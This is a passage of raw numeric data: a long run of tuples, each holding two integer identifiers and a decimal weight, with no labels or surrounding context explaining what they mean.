(253, 36671, 0.88669),
(261, 36671, 0.88669),
(246, 36671, 1.77338),
(253, 36672, 0.95669),
(246, 36672, 1.91338),
(168, 36674, 0.23331),
(253, 36674, 0.23331),
(265, 36674, 0.23331),
(266, 36674, 0.23331),
(237, 36677, 0.28),
(238, 36677, 0.28),
(248, 36677, 0.28),
(253, 36677, 0.28),
(256, 36677, 0.28),
(290, 36677, 0.28),
(305, 36677, 0.28),
(306, 36677, 0.28),
(253, 36681, 0.88669),
(268, 36681, 0.88669),
(269, 36681, 0.88669),
(242, 36681, 1.77338),
(272, 36681, 1.77338),
(280, 36681, 1.77338),
(253, 36682, 0.95669),
(242, 36682, 1.91338),
(273, 36700, 0.93331),
(253, 36700, 1.86662),
(168, 36708, 0.18669),
(238, 36708, 0.18669),
(253, 36708, 0.18669),
(263, 36708, 0.18669),
(305, 36708, 0.18669),
(306, 36708, 0.18669),
(239, 36853, 0.28),
(244, 36853, 0.28),
(253, 36853, 0.28),
(269, 36853, 0.28),
(272, 36853, 0.28),
(280, 36853, 0.28),
(295, 36853, 0.28),
(240, 36853, 0.56),
(239, 36905, 0.28),
(253, 36905, 0.56),
(246, 36910, 0.32669),
(253, 36910, 0.32669),
(240, 36913, 0.37331),
(253, 36913, 0.37331),
(254, 36913, 0.37331),
(274, 36913, 0.74662),
(243, 36913, 3.03981),
(178, 36925, 0.65338),
(253, 36925, 0.65338),
(235, 45797, 0.18669),
(254, 45797, 0.18669),
(263, 45797, 0.18669),
(288, 45797, 0.18669),
(236, 45803, 0.32669),
(254, 45803, 0.32669),
(256, 45803, 0.32669),
(236, 45804, 0.95669),
(254, 45804, 0.95669),
(235, 46033, 0.88669),
(239, 46033, 0.88669),
(241, 46033, 0.88669),
(254, 46033, 0.88669),
(238, 46033, 7.22019),
(243, 46033, 8.99357),
(235, 46034, 1.00331),
(254, 46034, 1.00331),
(238, 46034, 8.16981),
(243, 46034, 9.17312),
(168, 46281, 0.18669),
(240, 46281, 0.18669),
(248, 46281, 0.18669),
(254, 46281, 0.18669),
(269, 46281, 0.18669),
(235, 46281, 0.37338),
(236, 46303, 0.32669),
(254, 46303, 0.32669),
(235, 50676, 0.21),
(242, 50676, 0.21),
(235, 50873, 0.14),
(246, 50873, 0.14),
(269, 50873, 0.14),
(275, 50873, 0.14),
(287, 50873, 0.14),
(305, 50873, 0.14),
(178, 50873, 0.28),
(238, 50873, 0.28),
(240, 50873, 0.28),
(265, 50873, 0.28),
(266, 50873, 0.28),
(241, 50873, 0.42),
(288, 50873, 0.42),
(235, 50882, 0.42),
(257, 50882, 0.42),
(178, 50882, 1.68),
(235, 50885, 0.37331),
(259, 50885, 0.37331),
(260, 50885, 0.37331),
(265, 50885, 0.37331),
(266, 50885, 0.37331),
(235, 50886, 0.95669),
(259, 50886, 0.95669),
(260, 50886, 0.95669),
(235, 50888, 1.00331),
(242, 50888, 1.00331),
(178, 50949, 0.84),
(235, 50949, 0.84),
(240, 50949, 0.84),
(242, 50949, 0.84),
(247, 50949, 0.84),
(256, 50949, 0.84),
(258, 50949, 0.84),
(261, 50949, 0.84),
(265, 50949, 0.84),
(266, 50949, 0.84),
(292, 50949, 1.68),
(235, 50953, 0.95669),
(269, 50953, 0.95669),
(235, 50957, 0.93331),
(239, 50957, 0.93331),
(263, 50957, 0.93331),
(235, 50959, 0.91),
(259, 50959, 0.91),
(260, 50959, 0.91),
(261, 50959, 0.91),
(235, 51064, 0.88669),
(261, 51064, 0.88669),
(304, 51064, 0.88669),
(174, 51068, 0.93331),
(235, 51068, 0.93331),
(243, 51068, 0.93331),
(269, 51068, 0.93331),
(304, 51068, 0.93331),
(275, 51068, 8.53312),
(235, 51070, 0.88669),
(242, 51070, 0.88669),
(246, 51072, 0.84),
(269, 51072, 0.84),
(292, 51072, 0.84),
(235, 51072, 2.52),
(235, 51076, 0.95669),
(245, 51076, 0.95669),
(235, 51083, 0.93331),
(236, 51083, 0.93331),
(239, 51083, 0.93331),
(243, 51098, 0.91),
(267, 51098, 0.91),
(238, 51098, 1.82),
(235, 51098, 3.64),
(235, 51104, 0.86331),
(242, 51104, 0.86331),
(235, 51108, 0.81669),
(242, 51108, 0.81669),
(243, 51108, 0.81669),
(244, 51108, 0.81669),
(246, 51108, 0.81669),
(255, 51108, 0.81669),
(273, 51108, 0.81669),
(275, 51108, 0.81669),
(306, 51108, 0.81669),
(258, 51108, 1.63338),
(304, 51108, 1.63338),
(235, 51109, 0.91),
(258, 51109, 0.91),
(273, 51109, 0.91),
(235, 51112, 1.00331),
(238, 51112, 1.00331),
(235, 51121, 0.88669),
(263, 51121, 0.88669),
(235, 51123, 0.84),
(270, 51123, 0.84),
(301, 51123, 0.84),
(235, 51129, 0.81669),
(237, 51129, 0.81669),
(263, 51129, 0.81669),
(269, 51129, 0.81669),
(235, 51286, 0.37331),
(242, 51286, 0.37331),
(262, 51286, 0.37331),
(290, 51286, 0.37331),
(245, 51286, 0.74662),
(246, 51293, 0.18669),
(304, 51293, 0.18669),
(235, 51293, 0.37338),
(240, 64406, 0.42),
(258, 64406, 0.42),
(274, 64406, 0.42),
(275, 64406, 0.42),
(193, 64406, 0.84),
(193, 64428, 0.93331),
(261, 64428, 0.93331),
(193, 64439, 0.91),
(259, 64439, 0.91),
(260, 64439, 0.91),
(193, 64441, 0.88669),
(237, 64441, 0.88669),
(275, 64441, 0.88669),
(193, 64447, 0.93331),
(239, 64447, 0.93331),
(261, 64447, 0.93331),
(272, 64447, 0.93331),
(280, 64447, 0.93331),
(193, 64454, 0.18669),
(241, 64454, 0.18669),
(242, 64454, 0.18669),
(257, 64454, 0.18669),
(267, 64454, 0.37338),
(255, 64556, 0.88669),
(193, 64556, 1.77338),
(255, 64557, 1.00331),
(193, 64557, 2.00662),
(193, 64571, 0.18669),
(248, 64571, 0.18669),
(262, 64571, 0.18669),
(268, 64571, 0.18669),
(174, 64571, 0.37338),
(304, 64571, 0.37338),
(193, 64577, 0.28),
(239, 64577, 0.28),
(242, 64577, 0.28),
(244, 64577, 0.28),
(264, 64577, 0.28),
(275, 64577, 0.28),
(258, 64577, 0.56),
(193, 64598, 0.23331),
(237, 64598, 0.23331),
(241, 64598, 0.23331),
(305, 64598, 0.23331),
(193, 64604, 0.23331),
(237, 64604, 0.23331),
(239, 64604, 0.23331),
(242, 64604, 0.23331),
(258, 64604, 0.23331),
(274, 64604, 0.23331),
(238, 64604, 0.46662),
(178, 64604, 2.79972),
(249, 64611, 0.88669),
(262, 64611, 0.88669),
(267, 64611, 0.88669),
(275, 64611, 0.88669),
(193, 64611, 1.77338),
(237, 64611, 1.77338),
(264, 64611, 1.77338),
(193, 64612, 0.95669),
(237, 64612, 0.95669),
(193, 64616, 0.91),
(258, 64616, 0.91),
(292, 64616, 0.91),
(193, 64619, 0.91),
(239, 64619, 0.91),
(242, 64619, 0.91),
(263, 64619, 0.91),
(269, 64619, 0.91),
(305, 64619, 0.91),
(178, 64627, 0.32669),
(193, 64627, 0.32669),
(240, 64627, 0.32669),
(270, 64627, 0.32669),
(301, 64627, 0.32669),
(306, 64627, 0.32669),
(269, 64627, 0.65338),
(193, 64630, 0.37331),
(240, 64630, 0.37331),
(259, 64630, 0.37331),
(260, 64630, 0.37331),
(240, 64633, 0.32669),
(193, 64633, 0.98007),
(193, 64642, 0.95669),
(259, 64642, 0.95669),
(260, 64642, 0.95669),
(193, 64643, 1.05),
(259, 64643, 1.05),
(260, 64643, 1.05),
(193, 64790, 1.00331),
(244, 64790, 1.00331),
(256, 64790, 1.00331),
(295, 64790, 1.00331),
(299, 64790, 1.00331),
(305, 64790, 1.00331),
(178, 64790, 9.02979),
(243, 64791, 0.91),
(288, 64791, 0.91),
(193, 64791, 1.82),
(193, 64796, 0.81669),
(259, 64796, 0.81669),
(260, 64796, 0.81669),
(193, 64799, 1.02669),
(306, 64799, 1.02669),
(261, 64799, 2.05338),
(193, 64800, 0.98),
(239, 64800, 0.98),
(174, 64827, 0.56),
(193, 64827, 0.56),
(243, 64827, 0.56),
(267, 64827, 0.56),
(272, 64827, 0.56),
(280, 64827, 0.56),
(305, 64827, 0.56),
(306, 64827, 0.56),
(275, 64827, 3.92),
(193, 64833, 0.95669),
(257, 64833, 0.95669),
(264, 64833, 0.95669),
(193, 64838, 0.86331),
(241, 64838, 0.86331),
(193, 64840, 0.91),
(241, 64840, 0.91),
(243, 64840, 0.91),
(258, 64840, 0.91),
(265, 64840, 0.91),
(266, 64840, 0.91),
(274, 64840, 0.91),
(193, 64847, 0.88669),
(261, 64847, 0.88669),
(274, 64847, 0.88669),
(288, 64847, 0.88669),
(193, 64862, 0.98),
(242, 64862, 0.98),
(243, 64862, 0.98),
(193, 64874, 0.86331),
(261, 64874, 0.86331),
(168, 64878, 0.86331),
(178, 64878, 0.86331),
(193, 64878, 0.86331),
(237, 64878, 0.86331),
(246, 64878, 0.86331),
(255, 64878, 0.86331),
(261, 64878, 0.86331),
(264, 64878, 1.72662),
(269, 64878, 2.58993),
(193, 64909, 0.91),
(242, 64909, 0.91),
(245, 65160, 0.14),
(287, 65160, 0.14),
(306, 65160, 0.14),
(193, 65160, 0.28),
(193, 65170, 0.91),
(242, 65170, 0.91),
(243, 65170, 0.91),
(275, 65170, 0.91),
(193, 65171, 1.02669),
(242, 65171, 1.02669),
(168, 65188, 0.18669),
(193, 65188, 0.18669),
(240, 65188, 0.18669),
(244, 65188, 0.18669),
(262, 65188, 0.18669),
(272, 65188, 0.18669),
(280, 65188, 0.18669),
(288, 65188, 0.18669),
(306, 65188, 0.18669),
(174, 65188, 0.56007),
(193, 65189, 0.86331),
(240, 65189, 0.86331),
(193, 65198, 0.95669),
(240, 65198, 0.95669),
(259, 65205, 0.51331),
(260, 65205, 0.51331),
(193, 65205, 1.02662),
(193, 65210, 0.32669),
(240, 65210, 0.32669),
(241, 65210, 0.32669),
(193, 65226, 0.42),
(245, 65226, 0.42),
(261, 65226, 1.26),
(239, 65229, 0.28),
(193, 65229, 0.56),
(174, 66578, 0.98),
(236, 66578, 0.98),
(237, 66578, 0.98),
(256, 66578, 0.98),
(263, 66578, 0.98),
(265, 66578, 0.98),
(266, 66578, 0.98),
(274, 66578, 0.98),
(304, 66578, 0.98),
(305, 66578, 0.98),
(306, 66578, 0.98),
(288, 66578, 1.96),
(242, 66578, 2.94),
(257, 66578, 2.94),
(259, 66578, 2.94),
(260, 66578, 2.94),
(236, 66605, 0.88669),
(237, 66605, 0.88669),
(245, 66605, 0.88669),
(255, 66605, 0.88669),
(257, 66605, 0.88669),
(237, 68296, 0.28),
(241, 68296, 0.28),
(254, 68296, 0.28),
(255, 68296, 0.28),
(256, 68296, 0.28),
(257, 68296, 0.28),
(258, 68296, 0.28),
(259, 68296, 0.28),
(260, 68296, 0.28),
(261, 68296, 0.28),
(262, 68296, 0.28),
(264, 68296, 0.28),
(265, 68296, 0.28),
(266, 68296, 0.28),
(267, 68296, 0.28),
(268, 68296, 0.28),
(269, 68296, 0.28),
(270, 68296, 0.28),
(272, 68296, 0.28),
(273, 68296, 0.28),
(288, 68296, 0.28),
(290, 68296, 0.28),
(292, 68296, 0.28),
(301, 68296, 0.28),
(304, 68296, 0.28),
(305, 68296, 0.28),
(237, 68297, 1.02669),
(241, 68297, 1.02669),
(254, 68297, 1.02669),
(255, 68297, 1.02669),
(256, 68297, 1.02669),
(257, 68297, 1.02669),
(258, 68297, 1.02669),
(259, 68297, 1.02669),
(260, 68297, 1.02669),
(261, 68297, 1.02669),
(262, 68297, 1.02669),
(264, 68297, 1.02669),
(265, 68297, 1.02669),
(266, 68297, 1.02669),
(267, 68297, 1.02669),
(268, 68297, 1.02669),
(269, 68297, 1.02669),
(270, 68297, 1.02669),
(272, 68297, 1.02669),
(273, 68297, 1.02669),
(288, 68297, 1.02669),
(290, 68297, 1.02669),
(292, 68297, 1.02669),
(301, 68297, 1.02669),
(304, 68297, 1.02669),
(305, 68297, 1.02669),
(168, 68417, 0.23331),
(237, 68417, 0.23331),
(268, 68417, 0.23331),
(254, 68417, 0.46662),
(261, 68417, 0.69993),
(237, 68538, 0.86331),
(241, 68538, 0.86331),
(254, 68538, 0.86331),
(259, 68538, 0.86331),
(260, 68538, 0.86331),
(265, 68538, 0.86331),
(266, 68538, 0.86331),
(272, 68538, 0.86331),
(274, 68538, 0.86331),
(280, 68538, 0.86331),
(261, 68538, 1.72662),
(262, 68538, 1.72662),
(267, 68538, 1.72662),
(174, 68538, 3.45324),
(258, 68538, 3.45324),
(254, 68549, 0.91),
(237, 68549, 1.82),
(237, 68795, 0.95669),
(254, 68795, 0.95669),
(306, 68795, 0.95669),
(237, 68797, 0.28),
(254, 68797, 0.28),
(237, 68798, 0.93331),
(254, 68798, 0.93331),
(237, 68799, 1.07331),
(254, 68799, 1.07331),
(168, 74368, 0.23331),
(237, 74368, 0.23331),
(242, 74368, 0.23331),
(261, 74368, 0.23331),
(305, 74368, 0.23331),
(257, 74368, 0.69993),
(263, 74368, 0.69993),
(238, 74368, 1.39986),
(254, 75449, 0.28),
(257, 75449, 0.28),
(249, 75455, 0.37331),
(254, 75455, 0.37331),
(254, 75464, 0.28),
(256, 75464, 0.28),
(174, 75475, 0.46669),
(241, 75475, 0.46669),
(254, 75475, 0.46669),
(261, 75475, 0.93338),
(254, 75476, 1.05),
(261, 75476, 1.05),
(168, 75478, 0.46669),
(240, 75478, 0.46669),
(241, 75478, 0.46669),
(243, 75478, 0.46669),
(254, 75478, 0.46669),
(258, 75478, 0.46669),
(261, 75478, 0.46669),
(240, 75479, 1.12),
(241, 75479, 1.12),
(254, 75479, 1.12),
(242, 75493, 0.23331),
(254, 75493, 0.46662),
(242, 75498, 0.32669),
(254, 75498, 0.32669),
(239, 75501, 0.37331),
(242, 75501, 0.37331),
(254, 75501, 3.35979),
(168, 75549, 0.32669),
(239, 75549, 0.32669),
(254, 75549, 0.32669),
(264, 75549, 0.32669),
(240, 75553, 0.88669),
(254, 75553, 0.88669),
(256, 75553, 0.88669),
(254, 75554, 0.98),
(256, 75554, 0.98),
(239, 75559, 0.93331),
(240, 75559, 0.93331),
(241, 75559, 0.93331),
(254, 75559, 0.93331),
(241, 75563, 0.95669),
(254, 75563, 0.95669),
(240, 75567, 0.91),
(254, 75567, 0.91),
(241, 75567, 1.82),
(306, 75567, 2.73),
(240, 75568, 1.02669),
(254, 75568, 1.02669),
(178, 75577, 0.28),
(238, 75577, 0.28),
(254, 75577, 0.28),
(178, 75578, 0.95669),
(238, 75578, 0.95669),
(254, 75578, 0.95669),
(242, 75594, 0.23331),
(249, 75594, 0.23331),
(254, 75594, 0.23331),
(257, 75687, 0.86331),
(254, 75687, 1.72662),
(258, 75687, 2.58993),
(256, 75687, 4.31655),
(245, 75694, 0.28),
(254, 75694, 0.28),
(268, 75694, 0.28),
(272, 75694, 0.28),
(280, 75694, 0.28),
(269, 75694, 0.56),
(240, 75703, 1.05),
(254, 75703, 1.05),
(254, 75706, 0.95669),
(262, 75706, 0.95669),
(238, 75711, 0.81669),
(254, 75711, 0.81669),
(256, 75711, 0.81669),
(288, 75711, 0.81669),
(305, 75711, 0.81669),
(240, 75711, 1.63338),
(254, 75720, 0.81669),
(241, 75720, 1.63338),
(274, 75729, 0.88669),
(254, 75729, 2.66007),
(255, 75729, 2.66007),
(174, 75735, 0.88669),
(238, 75735, 0.88669),
(262, 75735, 0.88669),
(306, 75735, 0.88669),
(254, 75735, 2.66007),
(254, 75740, 0.84),
(256, 75740, 0.84),
(240, 75764, 0.14),
(241, 75764, 0.14),
(254, 75764, 0.14),
(257, 75764, 0.14),
(265, 75764, 0.14),
(266, 75764, 0.14),
(238, 75767, 0.86331),
(305, 75767, 0.86331),
(242, 75767, 1.72662),
(254, 75767, 2.58993),
(242, 75935, 0.18669),
(254, 75935, 0.18669),
(254, 75938, 0.95669),
(263, 75938, 0.95669),
(242, 75942, 0.37331),
(254, 75942, 0.37331),
(242, 75943, 0.98),
(254, 75943, 0.98),
(254, 75945, 0.98),
(274, 75945, 0.98),
(254, 75958, 0.32669),
(255, 75958, 0.32669),
(262, 75958, 0.32669),
(236, 77595, 0.60669),
(243, 77595, 0.60669),
(236, 77596, 1.07331),
(243, 77596, 1.07331),
(236, 77597, 1.23669),
(243, 77597, 1.23669),
(236, 77600, 0.46669),
(246, 77600, 0.46669),
(236, 77623, 0.37331),
(239, 77623, 0.37331),
(240, 77623, 0.37331),
(242, 77623, 0.37331),
(258, 77623, 0.37331),
(236, 77626, 0.56),
(273, 77626, 0.56),
(304, 77626, 0.56),
(305, 77626, 0.56),
(306, 77626, 0.56),
(275, 77626, 1.68),
(236, 77627, 1.05),
(304, 77627, 1.05),
(305, 77627, 1.05),
(275, 77627, 3.15),
(239, 77631, 0.42),
(236, 77631, 1.26),
(236, 77690, 0.23331),
(249, 77690, 0.23331),
(236, 77696, 0.18669),
(240, 77696, 0.18669),
(257, 77696, 0.18669),
(290, 77696, 0.18669),
(292, 77696, 0.18669),
(178, 77703, 0.23331),
(238, 77703, 0.23331),
(245, 77703, 0.23331),
(248, 77703, 0.23331),
(249, 77703, 0.23331),
(265, 77703, 0.23331),
(266, 77703, 0.23331),
(267, 77703, 0.23331),
(236, 77703, 0.46662),
(236, 77706, 0.93331),
(249, 77706, 0.93331),
(174, 77715, 0.23331),
(236, 77715, 0.23331),
(240, 77715, 0.23331),
(243, 77715, 0.23331),
(247, 77715, 0.23331),
(268, 77715, 0.23331),
(242, 77715, 0.46662),
(249, 77715, 0.46662),
(248, 77715, 0.69993),
(236, 77716, 0.88669),
(240, 77716, 0.88669),
(242, 77716, 0.88669),
(236, 77815, 0.81669),
(258, 77815, 0.81669),
(288, 77815, 0.81669),
(174, 77820, 0.79331),
(236, 77820, 0.79331),
(236, 77822, 0.79331),
(238, 77822, 0.79331),
(236, 77824, 1.00331),
(270, 77824, 1.00331),
(301, 77824, 1.00331),
(236, 77830, 0.95669),
(265, 77830, 0.95669),
(266, 77830, 0.95669),
(236, 77832, 0.88669),
(242, 77832, 0.88669),
(236, 77850, 0.88669),
(248, 77850, 0.88669),
(236, 77856, 0.93331),
(239, 77856, 0.93331),
(236, 77866, 0.81669),
(270, 77866, 0.81669),
(301, 77866, 0.81669),
(239, 77882, 0.93331),
(242, 77882, 0.93331),
(248, 77882, 0.93331),
(236, 77882, 1.86662),
(236, 77883, 1.02669),
(242, 77883, 1.02669),
(236, 77885, 0.23331),
(238, 77885, 0.46662),
(174, 78015, 0.32669),
(236, 78015, 0.98007),
(236, 78024, 0.42),
(242, 78024, 0.42),
(238, 82075, 0.95669),
(255, 82075, 0.95669),
(306, 82075, 0.95669),
(237, 84600, 1.14331),
(269, 84600, 1.14331),
(237, 84623, 0.28),
(258, 84623, 0.28),
(274, 84623, 0.28),
(241, 84623, 0.56),
(249, 84623, 1.24),
(237, 84624, 1.02669),
(274, 84624, 1.02669),
(237, 84632, 1.07331),
(240, 84632, 1.07331),
(237, 84640, 0.32669),
(245, 84640, 0.32669),
(256, 84640, 0.32669),
(258, 84640, 0.32669),
(237, 84693, 0.42),
(287, 84693, 0.42),
(292, 84693, 0.42),
(274, 84693, 1.26),
(305, 84693, 1.26),
(178, 84704, 0.84),
(237, 84704, 0.84),
(240, 84704, 0.84),
(242, 84704, 0.84),
(168, 84708, 0.81669),
(237, 84708, 0.81669),
(243, 84708, 0.81669),
(255, 84708, 0.81669),
(267, 84708, 0.81669),
(306, 84708, 0.81669),
(269, 84708, 1.63338),
(237, 84711, 0.98),
(255, 84711, 0.98),
(269, 84711, 0.98),
(305, 84711, 0.98),
(178, 84719, 0.91),
(237, 84719, 0.91),
(237, 84813, 0.37331),
(275, 84813, 0.37331),
(306, 84813, 0.37331),
(237, 84817, 0.23331),
(258, 84817, 0.23331),
(237, 84823, 0.37331),
(259, 84823, 0.37331),
(260, 84823, 0.37331),
(304, 84823, 0.37331),
(237, 84826, 0.32669),
(239, 84826, 0.32669),
(243, 84826, 0.32669),
(244, 84826, 0.32669),
(249, 84826, 0.32669),
(275, 84826, 0.32669),
(305, 84826, 0.32669),
(268, 84826, 0.65338),
(306, 84826, 0.65338),
(174, 90666, 0.32669),
(178, 90666, 0.32669),
(239, 90666, 0.32669),
(255, 90666, 0.32669),
(262, 90666, 0.32669),
(265, 90666, 0.32669),
(266, 90666, 0.32669),
(241, 90666, 0.65338),
(239, 90682, 0.98),
(261, 90682, 0.98),
(273, 90682, 0.98),
(255, 90682, 1.96),
(272, 90682, 1.96),
(280, 90682, 1.96),
(295, 90682, 1.96),
(287, 90682, 3.36),
(259, 90682, 3.92),
(260, 90682, 3.92),
(239, 90714, 0.95669),
(255, 90714, 0.95669),
(168, 90774, 0.91),
(239, 90774, 0.91),
(240, 90774, 0.91),
(272, 90774, 0.91),
(280, 90774, 0.91),
(255, 90774, 1.82),
(239, 90925, 0.32669),
(255, 90925, 0.32669),
(239, 90928, 0.93331),
(241, 90928, 0.93331),
(255, 90928, 0.93331),
(304, 90928, 0.93331),
(238, 91971, 0.91),
(261, 91971, 0.91),
(238, 91973, 0.88669),
(257, 91973, 0.88669),
(238, 91977, 0.91),
(242, 91977, 0.91),
(263, 91977, 0.91),
(238, 91982, 0.88669),
(241, 91982, 0.88669),
(238, 91984, 0.28),
(249, 91984, 0.28),
(262, 91984, 0.56),
(238, 91985, 0.91),
(249, 91985, 0.91),
(262, 91985, 0.91),
(178, 91987, 0.32669),
(238, 91987, 0.32669),
(239, 91987, 0.32669),
(240, 91987, 0.32669),
(257, 91987, 0.32669),
(261, 91987, 0.32669),
(263, 91987, 0.32669),
(267, 91987, 0.32669),
(269, 91987, 0.32669),
(275, 91987, 0.32669),
(288, 91987, 0.32669),
(306, 91987, 0.65338),
(270, 91987, 0.98007),
(272, 91987, 0.98007),
(280, 91987, 0.98007),
(301, 91987, 0.98007),
(259, 91987, 1.96014),
(260, 91987, 1.96014),
(238, 91990, 0.86331),
(274, 91990, 0.86331),
(304, 91990, 0.86331),
(305, 91990, 0.86331),
(306, 91990, 0.86331),
(238, 91995, 0.46669),
(270, 91995, 0.46669),
(301, 91995, 0.46669),
(238, 92001, 1.14331),
(272, 92001, 1.14331),
(280, 92001, 1.14331),
(238, 92005, 1.00331),
(243, 92005, 1.00331),
(238, 92006, 1.05),
(261, 92006, 1.05),
(238, 92015, 0.86331),
(248, 92015, 0.86331),
(261, 92055, 0.56),
(275, 92055, 1.12),
(238, 92055, 1.68),
(174, 92061, 0.14),
(238, 92061, 0.14),
(240, 92061, 0.14),
(242, 92061, 0.14),
(288, 92061, 0.42),
(238, 92079, 0.14),
(248, 92079, 0.14),
(257, 92079, 0.14),
(305, 92079, 0.14),
(238, 92082, 0.14),
(243, 92082, 0.14),
(238, 92089, 0.32669),
(243, 92089, 0.32669),
(168, 92096, 0.91),
(238, 92096, 0.91),
(178, 92100, 0.84),
(238, 92100, 1.68),
(168, 92140, 0.37331),
(238, 92140, 0.37331),
(238, 92263, 0.86331),
(242, 92263, 0.86331),
(238, 92271, 0.56),
(168, 92271, 1.12),
(240, 92271, 1.12),
(238, 92277, 0.56),
(272, 92277, 0.56),
(280, 92277, 0.56),
(238, 92280, 0.37331),
(267, 92280, 2.61317),
(238, 92281, 1.00331),
(267, 92281, 4.01324),
(238, 92282, 1.09669),
(267, 92282, 1.09669),
(238, 92289, 0.91),
(275, 92289, 0.91),
(238, 92295, 0.93331),
(259, 92295, 0.93331),
(260, 92295, 0.93331),
(292, 92295, 0.93331),
(238, 92296, 1.02669),
(259, 92296, 1.02669),
(260, 92296, 1.02669),
(292, 92296, 1.02669),
(238, 92305, 0.91),
(264, 92305, 0.91),
(238, 92310, 0.46669),
(241, 92310, 0.93338),
(238, 92313, 0.79331),
(240, 92313, 0.79331),
(288, 92313, 0.79331),
(238, 92315, 0.93331),
(240, 92315, 0.93331),
(241, 92315, 0.93331),
(265, 92315, 0.93331),
(266, 92315, 0.93331),
(270, 92315, 0.93331),
(301, 92315, 0.93331),
(238, 92316, 0.86331),
(262, 92316, 0.86331),
(238, 92317, 0.93331),
(262, 92317, 0.93331),
(238, 92319, 0.84),
(267, 92319, 0.84),
(272, 92319, 0.84),
(280, 92319, 0.84),
(238, 92325, 0.88669),
(240, 92325, 0.88669),
(246, 92329, 0.14),
(268, 92329, 0.14),
(238, 92329, 0.28),
(238, 92351, 0.98),
(242, 92351, 0.98),
(238, 92529, 0.37331),
(248, 92529, 0.37331),
(263, 92529, 0.37331),
(238, 92530, 0.95669),
(248, 92530, 0.95669),
(238, 92535, 0.42),
(261, 92535, 0.42),
(256, 92543, 0.32669),
(238, 92543, 0.65338),
(168, 92543, 2.10015),
(174, 92543, 2.98688),
(238, 92551, 0.32669),
(239, 92551, 0.32669),
(259, 92551, 0.32669),
(260, 92551, 0.32669),
(174, 92562, 0.32669),
(178, 92562, 0.32669),
(238, 92562, 0.32669),
(239, 92562, 0.32669),
(259, 92562, 0.32669),
(260, 92562, 0.32669),
(269, 92562, 1.63345),
(306, 92562, 1.63345),
(274, 92562, 9.19399),
(239, 100206, 0.28),
(243, 100206, 0.28),
(304, 100206, 0.28),
(242, 100206, 1.12),
(239, 100207, 0.91),
(243, 100207, 0.91),
(242, 100207, 2.73),
(239, 100209, 0.37331),
(241, 100209, 0.37331),
(244, 100209, 0.37331),
(239, 100220, 0.51331),
(240, 100220, 0.51331),
(239, 100221, 1.14331),
(240, 100221, 1.14331),
(239, 100222, 1.26),
(240, 100222, 1.26),
(239, 100228, 0.51331),
(241, 100228, 0.51331),
(249, 100228, 1.02662),
(174, 100231, 0.46669),
(239, 100231, 0.46669),
(174, 100232, 1.00331),
(239, 100232, 1.00331),
(239, 100234, 0.98),
(262, 100234, 0.98),
(240, 100234, 1.96),
(239, 100235, 1.12),
(240, 100235, 1.12),
(168, 100247, 0.28),
(239, 100247, 0.28),
(240, 100261, 0.98),
(239, 100261, 1.96),
(239, 100275, 0.23331),
(268, 100275, 0.23331),
(239, 100278, 0.28),
(256, 100278, 0.28),
(270, 100278, 0.28),
(301, 100278, 0.28),
(239, 100281, 0.28),
(240, 100281, 0.28),
(242, 100281, 0.28),
(269, 100281, 0.28),
(239, 100333, 0.28),
(241, 100333, 0.28),
(239, 100336, 0.18669),
(241, 100336, 0.18669),
(257, 100336, 0.18669),
(267, 100336, 0.18669),
(268, 100336, 0.18669),
(261, 100336, 0.37338),
(239, 100352, 1.00331),
(240, 100352, 1.00331),
(242, 100352, 1.00331),
(268, 100352, 1.00331),
(239, 100373, 0.88669),
(304, 100373, 0.88669),
(174, 100373, 3.54676),
(239, 100374, 0.95669),
(304, 100374, 0.95669),
(174, 100374, 1.91338),
(239, 100508, 0.42),
(244, 100508, 0.84),
(239, 100514, 0.42),
(240, 100514, 0.42),
(247, 100514, 0.42),
(174, 100514, 0.84),
(242, 100514, 0.84),
(306, 100514, 0.84),
(304, 100517, 0.93331),
(239, 100517, 2.26661),
(240, 100517, 2.26661),
(242, 100517, 2.26661),
(239, 100521, 0.93331),
(265, 100521, 0.93331),
(266, 100521, 0.93331),
(239, 100533, 0.88669),
(264, 100533, 0.88669),
(272, 100533, 0.88669),
(280, 100533, 0.88669),
(239, 100534, 0.95669),
(264, 100534, 0.95669),
(272, 100534, 0.95669),
(280, 100534, 0.95669),
(168, 100535, 0.98),
(239, 100535, 0.98),
(240, 100535, 0.98),
(290, 100535, 0.98),
(242, 100535, 1.96),
(239, 100546, 0.32669),
(262, 100546, 0.32669),
(239, 100556, 0.84),
(241, 100556, 0.84),
(268, 100556, 0.84),
(263, 100556, 1.68),
(288, 100556, 1.68),
(174, 100560, 0.91),
(239, 100560, 0.91),
(242, 100560, 0.91),
(239, 100567, 0.95669),
(258, 100567, 0.95669),
(239, 100569, 0.98),
(247, 100569, 0.98),
(239, 100571, 0.86331),
(240, 100571, 0.86331),
(239, 100572, 0.91),
(240, 100572, 0.91),
(174, 100576, 0.81669),
(259, 100576, 0.81669),
(260, 100576, 0.81669),
(269, 100576, 0.81669),
(274, 100576, 0.81669),
(288, 100576, 0.81669),
(306, 100576, 0.81669),
(239, 100576, 1.63338),
(261, 100576, 1.63338),
(240, 100576, 2.45007),
(242, 100576, 3.26676),
(239, 100582, 0.93331),
(249, 100582, 0.93331),
(261, 100582, 0.93331),
(304, 100582, 0.93331),
(239, 100591, 0.84),
(268, 100591, 0.84),
(239, 100595, 0.88669),
(243, 100595, 0.88669),
(244, 100595, 0.88669),
(248, 100595, 0.88669),
(263, 100595, 0.88669),
(288, 100595, 0.88669),
(305, 100595, 0.88669),
(239, 100609, 0.18669),
(257, 100609, 0.18669),
(240, 100613, 0.88669),
(244, 100613, 0.88669),
(247, 100613, 0.88669),
(257, 100613, 0.88669),
(306, 100613, 0.88669),
(239, 100613, 1.77338),
(240, 100614, 0.95669),
(257, 100614, 0.95669),
(306, 100614, 0.95669),
(239, 100614, 1.91338),
(239, 100617, 0.91),
(241, 100617, 0.91),
(244, 100617, 0.91),
(239, 100849, 0.18669),
(244, 100849, 0.18669),
(265, 100849, 0.18669),
(266, 100849, 0.18669),
(178, 100849, 0.37338),
(239, 100874, 0.28),
(240, 100874, 0.28),
(305, 100874, 0.28),
(239, 100875, 1.02669),
(240, 100875, 1.02669),
(240, 100877, 0.23331),
(241, 100877, 0.23331),
(258, 100877, 0.23331),
(292, 100877, 0.23331),
(305, 100877, 0.23331),
(239, 100877, 0.69993),
(242, 100877, 0.69993),
(239, 100878, 0.88669),
(242, 100878, 0.88669),
(239, 100879, 0.98),
(242, 100879, 0.98),
(239, 100884, 1.02),
(242, 100884, 1.02),
(240, 100884, 1.44),
(239, 100885, 2.43661),
(242, 100885, 2.43661),
(240, 100885, 3.43992),
(239, 100886, 2.94661),
(242, 100886, 2.94661),
(240, 100886, 4.15992),
